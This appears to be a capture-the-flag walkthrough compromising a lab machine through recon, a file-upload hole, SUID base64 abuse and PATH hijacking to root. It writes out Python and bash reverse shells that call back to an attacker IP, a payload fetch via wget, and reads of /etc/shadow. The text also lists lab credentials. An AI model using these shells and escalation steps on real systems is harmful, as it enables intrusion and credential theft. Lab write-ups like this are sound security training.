Cybherius

nmap -p- --min-rate 10000 10.10.128.57 -Pn

After detection of open ports, let's do greater nmap scan for these ports.

nmap -A -sC -sV -p21,22,80 10.10.128.57 -Pn

We can login into ftp via anonymous credentials.

I find index.php file via gobuster

gobuster dir -u 'http://10.10.128.57/' -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 10 -x php

Look at below on source code

<!-- The Caspian tide carries secrets: /caspian_spark -->

Gpt finds your source code explained.

We are on below url.

http://10.10.128.57/caspian_spark/flame_rise/echoes_of_stones/

We download file.

exiftool final_artifact.png

# http://target-ip/baku_314/vault/

We find upload page.

http://10.10.128.57/baku_314/vault/upload.php

File upload vulnerability request

Command execution is possible now.

Let's add reverse shell.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.2.12.215",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Let's make interactive shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo;fg
export TERM=xterm
export SHELL=bash

Let's upload linpeas.sh into machine.

python3 -m http.server --bind 10.2.12.215 8080

We download file from http.server

wget http://10.2.12.215:8080/linpeas.sh

We can see SUID bits;

/usr/bin/base64

First flag.

cat /flag.txt

Go to https://github.com/cybherius/PetrolRegistry from hint.txt.

Run python script.

python3 Neftci.py

# password: BakuBlackGold2025!

It is password of netfci user on system.

neftci : BakuBlackGold2025!

I add my public key into authorized_keys of netfci user to login via ssh.

Looking at commits , I find password of .zip file from this commit

petrol123

unzip flag.zip # use this password then read flag.txt

Then, cat .bash_history for neftci user.

Login into ftp and get three files.

neftci: NeftDashlari2025!

There is file key and key.pub, we read key.pub and see that it belongs to khazar user.

chmod 600 key
ssh -i key [email protected]

Flag 3.

LFILE="/home/khazar/hidden_data/flag.txt"
/usr/bin/base64 "$LFILE" | base64 --decode

For Privilege Escalation to root user, let's run linpeas.sh again

We can read /etc/shadow file.

LFILE="/etc/shadow"
/usr/bin/base64 "$LFILE" | base64 --decode

We find /usr/local/games/run.

Let's read source code of this

I got source code as below.

LFILE="/usr/local/games/run"
/usr/bin/base64 "$LFILE" | base64 > /home/khazar/run_data

Download file to local.

wget http://10.10.137.51:8080/run_data
cat run_data | base64 -d | base64 -d > run

I run this executable via strings command

I look at libraries loaded.

ltrace ./run

\

We see that player command is run. Let's create this command with malicious content

I will abuse $PATH environment variable.

cd /dev/shm
echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.2.12.215/1338 0>&1' > player
chmod +x player
export PATH="/dev/shm:$PATH"
/usr/local/games/run

Hola, we got root shell.